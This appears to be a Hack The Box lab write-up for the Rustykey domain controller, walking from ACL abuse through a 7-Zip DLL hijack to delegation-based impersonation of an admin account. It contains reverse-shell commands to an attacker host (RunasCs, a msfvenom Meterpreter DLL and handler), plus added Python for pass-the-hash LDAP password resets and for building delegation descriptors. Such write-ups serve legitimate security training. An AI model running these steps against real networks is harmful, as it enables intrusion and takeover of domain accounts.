Rustykey is a hard-difficulty machine from Hack The Box. It starts with a timeroasting attack to recover a machine account hash, which we use to abuse a chain of misconfigured ACLs, then a DLL hijack against 7-Zip, and finally write access over a delegation attribute (resource-based constrained delegation) to impersonate an administrative account against the domain controller.
```
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-04 03:59:59Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=7/3%OT=53%CT=1%CU=42486%PV=Y%DS=2%DC=T%G=Y%TM=6866E1B5
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=106%TI=I%CI=I%II=I%SS=O%TS=U
OS:)SEQ(SP=102%GCD=1%ISR=107%TI=I%CI=I%II=I%SS=O%TS=U)SEQ(SP=107%GCD=1%ISR=
OS:10A%TI=I%CI=I%II=I%SS=O%TS=U)SEQ(SP=108%GCD=1%ISR=10D%TI=I%CI=I%II=I%SS=
OS:O%TS=U)SEQ(SP=108%GCD=1%ISR=10D%TI=I%CI=I%II=I%SS=S%TS=U)OPS(O1=M542NW8N
OS:NS%O2=M542NW8NNS%O3=M542NW8%O4=M542NW8NNS%O5=M542NW8NNS%O6=M542NNS)WIN(W
OS:1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF%
OS:O=M542NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=
OS:N)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A
OS:=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=N)U
OS:1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DF
OS:I=N%T=80%CD=Z)

TRACEROUTE (using port 256/tcp)
HOP RTT       ADDRESS
1   582.02 ms 10.10.16.1
2   296.04 ms 10.10.11.75

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 127.85 seconds
```
Kerberos on port 88, together with DNS on 53 and LDAP on 389/636/3268/3269, tells us this is a Windows Active Directory domain controller, and WinRM on 5985 gives us a way in later. Nmap also leaks the domain name, rustykey.htb, so we add it to /etc/hosts; Kerberos authentication later on also needs the DC's FQDN (dc.rustykey.htb) to resolve.
We are also given starting credentials: rr.parker / 8#t5HE8L!W3A
In BloodHound we will see that the IT-COMPUTER3 machine account (the one whose hash we recovered by timeroasting) has AddSelf on the HELPDESK group, and that HELPDESK has ForceChangePassword over several user accounts. We abuse that chain by adding the machine account to the group and then resetting a user's password:
evil-winrm will not work yet: the target users are members of IT, which is itself nested into the protected groups (Protected Users membership disables NTLM authentication for the account), so we first have to remove them from that group. After doing that we request a TGT as BB.MORGAN:
```
[*] Saving ticket in BB.MORGAN.ccache

┌──(kali㉿kali)-[~/Downloads/hashcat-6.2.6 (2)]
└─$ export KRB5CCNAME=BB.MORGAN.ccache

┌──(kali㉿kali)-[~/Downloads/hashcat-6.2.6 (2)]
└─$ evil-winrm -i rustykey.htb -r rustykey.htb
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type GSSAPI::GssApiError happened, message is gss_init_sec_context did not return GSS_S_COMPLETE: Unspecified GSS failure. Minor code may provide more information
Server not found in Kerberos database
Error: Exiting with code 1

┌──(kali㉿kali)-[~/Downloads/hashcat-6.2.6 (2)]
└─$ evil-winrm -i dc.rustykey.htb -r RUSTYKEY.HTB
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\bb.morgan\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\bb.morgan\desktop> cat user.txt
6e4e745e270dd4cfa899899d0bc516fc
*Evil-WinRM* PS C:\Users\bb.morgan\desktop>
```
The first attempt fails with "Server not found in Kerberos database" because the client asks the KDC for a service ticket for HTTP/rustykey.htb, an SPN that does not exist. With Kerberos authentication the target must be the host's FQDN (dc.rustykey.htb), which is what the second attempt uses.
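The LDAP operations behind the three steps above (adding ourselves to HELPDESK, resetting a user's password, and pulling a user out of the protected group) are shown below as an added example; this is not the writeup's own command set and not code from any of the tools it uses. The DC hostname, the DNs and the new password are assumptions for illustration, and the pass-the-hash bind relies on ldap3 accepting an LMHASH:NTHASH string in place of a password, which is also an assumption to verify against your ldap3 version. The builders are pure Python; only `run()` needs `pip install ldap3` and a reachable DC.

```python
"""LDAP primitives behind AddSelf, ForceChangePassword and group removal.
Added example, not the writeup's commands; names below are assumptions."""
import ssl

# ldap3's MODIFY_* constants are these plain strings, so no import is needed here.
MODIFY_ADD, MODIFY_DELETE, MODIFY_REPLACE = "MODIFY_ADD", "MODIFY_DELETE", "MODIFY_REPLACE"


def group_add_member_mod(member_dn: str) -> dict:
    """AddSelf/AddMember is a write of the group's `member` attribute:
    a single MODIFY_ADD of the DN we control."""
    return {"member": [(MODIFY_ADD, [member_dn])]}


def group_remove_member_mod(member_dn: str) -> dict:
    """Taking an account out of a protected group (and cleaning up afterwards)
    is the inverse operation on the same attribute."""
    return {"member": [(MODIFY_DELETE, [member_dn])]}


def encode_unicode_pwd(password: str) -> bytes:
    """AD accepts `unicodePwd` only as the password wrapped in double quotes,
    encoded UTF-16-LE, and only over an encrypted bind (LDAPS here)."""
    return ('"%s"' % password).encode("utf-16-le")


def password_reset_mod(password: str) -> dict:
    """A lone MODIFY_REPLACE of unicodePwd is an administrative reset, which is
    exactly what User-Force-Change-Password grants: no old password needed."""
    return {"unicodePwd": [(MODIFY_REPLACE, [encode_unicode_pwd(password)])]}


def run(dc_host, domain, user, secret, group_dn, self_dn, target_dn, new_password):
    """Bind over LDAPS with NTLM (password, or LMHASH:NTHASH for the machine
    account hash; assumed ldap3 behaviour) and apply add-self then reset."""
    import ldap3  # imported here so the pure helpers above work without it

    tls = ldap3.Tls(validate=ssl.CERT_NONE)  # lab DC with a self-signed certificate
    server = ldap3.Server(dc_host, port=636, use_ssl=True, tls=tls, get_info=ldap3.NONE)
    conn = ldap3.Connection(server, user=f"{domain}\\{user}", password=secret,
                            authentication=ldap3.NTLM, auto_bind=True)
    for dn, mod in ((group_dn, group_add_member_mod(self_dn)),
                    (target_dn, password_reset_mod(new_password))):
        if not conn.modify(dn, mod):
            raise RuntimeError(f"modify {dn} failed: {conn.result}")
    conn.unbind()


if __name__ == "__main__":  # every value here is an assumption; adjust to the lab
    run("dc.rustykey.htb", "rustykey.htb", "IT-COMPUTER3$",
        "aad3b435b51404eeaad3b435b51404ee:<nthash-from-timeroasting>",
        "CN=HELPDESK,CN=Users,DC=rustykey,DC=htb",
        "CN=IT-COMPUTER3,CN=Computers,DC=rustykey,DC=htb",
        "CN=bb.morgan,CN=Users,DC=rustykey,DC=htb", "NewPassw0rd!")
```

The order matters: the password reset is only authorised once the machine account is a HELPDESK member, and the reset is sent as one replace of `unicodePwd` rather than the delete-then-add pair a self-service password change would need.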
Privilege Escalation - ACL to Delegation abuse
On BB.MORGAN's desktop we find a PDF addressed to the support team saying its members have been granted extended rights related to compression and extraction (7-Zip). So we need to impersonate one of them (again not forgetting to remove the account from the protected users group first). BloodHound shows that EE.REED is a member of the SUPPORT group. With a password set for EE.REED, we switch to that user with RunasCs from the BB.MORGAN session:
```
*Evil-WinRM* PS C:\Users\bb.morgan\Documents> .\RunasCS.exe ee.reed kujenPassword1 powershell.exe -r 10.10.16.48:4444
[*] Warning: User profile directory for user ee.reed does not exists. Use --force-profile if you want to force the creation.
[*] Warning: The logon for user 'ee.reed' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-d9805$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 5412 created in background.
```
From the new shell we list the user profiles on the box; note mm.turner:

```
PS C:\> ls users

    Directory: C:\users

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        6/4/2025   9:37 AM                Administrator
d-----      12/30/2024   8:53 PM                bb.morgan
d-----      12/31/2024   1:19 PM                mm.turner
d-r---      12/26/2024   4:22 PM                Public
```
Next we generate a Meterpreter DLL for the 7-Zip DLL hijack:

```
┌──(kali㉿kali)-[~/Downloads]
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.48 LPORT=4445 -f dll -o kujen.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 9216 bytes
Saved as: kujen.dll
```

The handler is first started on the default LPORT 4444, which does not match the DLL's LPORT=4445, so it is interrupted and restarted on 4445:

```
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
LHOST                      yes       The listen address (an interface may be specified)
LPORT     4444             yes       The listen port

Exploit target:

Id  Name
--  ----
0   Wildcard Target

View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set lhost 10.10.16.48
lhost => 10.10.16.48
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.16.48:4444
^C[-] Exploit failed [user-interrupt]: Interrupt
[-] run: Interrupted
msf6 exploit(multi/handler) > set lport 4445
lport => 4445
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.16.48:4445
[*] Sending stage (203846 bytes) to 10.10.11.75
[*] Meterpreter session 1 opened (10.10.16.48:4445 -> 10.10.11.75:58791) at 2025-07-04 14:51:27 -0400

meterpreter > shell
Process 1164 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.7434]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows>whoami
rustykey\mm.turner

C:\Windows>
```

The callback comes in as MM.TURNER, so the hijacked DLL was loaded by a process running under that account.
BloodHound shows that MM.TURNER is a member of the DELEGATIONMANAGER group, which can write the DC computer object's msDS-AllowedToActOnBehalfOfOtherIdentity attribute. Writing IT-COMPUTER3$ into it configures resource-based constrained delegation: the machine account whose hash we already hold is then allowed to request service tickets to the DC on behalf of other users. From the Meterpreter session we set it with the Set-ADComputer cmdlet:
```
meterpreter > shell
Process 1944 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.7434]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows> $comp = 'IT-COMPUTER3$'
PS C:\Windows> Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount $comp -Verbose
VERBOSE: Performing the operation "Set" on target "CN=DC,OU=Domain Controllers,DC=rustykey,DC=htb".
PS C:\Windows>
```
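What that cmdlet actually writes is a binary security descriptor in msDS-AllowedToActOnBehalfOfOtherIdentity whose DACL lists the principals allowed to delegate to the DC. The Python below is an added example, not code from the writeup or from impacket, that builds such a descriptor for a given SID with the layout impacket's rbcd.py uses (self-relative SD, owner and group BUILTIN\Administrators, one full-control ACCESS_ALLOWED ACE per principal) and parses one back. The parse direction is the defender's side of the same attribute: reading it off every computer object is how you spot delegation entries nobody configured on purpose. The SID values in the demo are made up.

```python
"""Build and parse the msDS-AllowedToActOnBehalfOfOtherIdentity descriptor
(resource-based constrained delegation).  Added example; SIDs are made up."""
import struct

SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACL_REVISION_DS = 4
ACCESS_ALLOWED_ACE_TYPE = 0x00
FULL_CONTROL = 0x000F01FF          # mask rbcd.py puts in the allowed-to-act ACE
BUILTIN_ADMINS = "S-1-5-32-544"    # owner/group of the descriptor


def sid_to_bytes(sid: str) -> bytes:
    """'S-1-5-21-...' -> binary SID: revision, sub-authority count,
    48-bit big-endian identifier authority, little-endian sub-authorities."""
    s, rev, auth, *subs = sid.split("-")
    if s != "S":
        raise ValueError(f"not a SID: {sid}")
    return (struct.pack("<BB", int(rev), len(subs)) + int(auth).to_bytes(6, "big")
            + b"".join(struct.pack("<I", int(x)) for x in subs))


def bytes_to_sid(data: bytes, offset: int = 0) -> str:
    """Inverse of sid_to_bytes, reading at `offset` inside a larger buffer."""
    rev, count = struct.unpack_from("<BB", data, offset)
    auth = int.from_bytes(data[offset + 2:offset + 8], "big")
    subs = struct.unpack_from("<%dI" % count, data, offset + 8)
    return "S-%d-%d" % (rev, auth) + "".join("-%d" % x for x in subs)


def build_rbcd_sd(allowed_sids) -> bytes:
    """Self-relative security descriptor granting each SID the right to act on
    behalf of other identities towards the object this attribute is set on."""
    aces = b""
    for sid in allowed_sids:
        sid_b = sid_to_bytes(sid)
        ace_size = 4 + 4 + len(sid_b)            # ACE header + access mask + SID
        aces += (struct.pack("<BBH", ACCESS_ALLOWED_ACE_TYPE, 0, ace_size)
                 + struct.pack("<I", FULL_CONTROL) + sid_b)
    # ACL header: revision, sbz1, size, ace count, sbz2
    dacl = struct.pack("<BBHHH", ACL_REVISION_DS, 0, 8 + len(aces), len(allowed_sids), 0) + aces
    owner = group = sid_to_bytes(BUILTIN_ADMINS)
    off_owner = 20                               # size of the SD header itself
    off_group = off_owner + len(owner)
    off_dacl = off_group + len(group)            # no SACL, so its offset stays 0
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         off_owner, off_group, 0, off_dacl)
    return header + owner + group + dacl


def parse_rbcd_sd(data: bytes) -> list:
    """Return the SIDs allowed to delegate, i.e. every ACCESS_ALLOWED ACE in
    the DACL; an empty or DACL-less descriptor yields []."""
    rev, _, control, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", data, 0)
    if rev != 1 or not control & SE_DACL_PRESENT or off_dacl == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", data, off_dacl)
    pos, sids = off_dacl + 8, []
    for _ in range(ace_count):
        ace_type, _, ace_size = struct.unpack_from("<BBH", data, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sids.append(bytes_to_sid(data, pos + 8))  # skip ACE header and mask
        pos += ace_size
    return sids


if __name__ == "__main__":
    computer_sid = "S-1-5-21-111-222-333-1105"     # made-up SID standing in for IT-COMPUTER3$
    sd = build_rbcd_sd([computer_sid])
    print(sd.hex())
    print(parse_rbcd_sd(sd))
```

The same bytes are what an LDAP client would write with a replace of msDS-AllowedToActOnBehalfOfOtherIdentity, and on the detection side any computer object (a domain controller above all) whose parsed list contains a SID that is not an expected service account deserves an immediate look.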
With delegation in place, IT-COMPUTER3$'s hash lets us run impacket's getST.py against the DC, which performs S4U2self followed by S4U2proxy and hands back a service ticket for the DC as backupadmin:

```
[*] Impersonating backupadmin
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in backupadmin.ccache

┌──(kali㉿kali)-[~/Downloads]
└─$ export KRB5CCNAME=backupadmin.ccache
```
```
┌──(kali㉿kali)-[~/Downloads]
└─$ smbexec.py -k -no-pass 'RUSTYKEY.HTB/backupadmin@dc.rustykey.htb'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>cat c:/users/administrator/desktop/root.txt
'cat' is not recognized as an internal or external command,
operable program or batch file.

C:\Windows\system32>type c:/users/administrator/desktop/root.txt
The syntax of the command is incorrect.
```

Two cmd.exe gotchas in the smbexec shell: there is no `cat`, and `type` does not accept forward-slash paths, so the flag is read with `type C:\Users\Administrator\Desktop\root.txt`.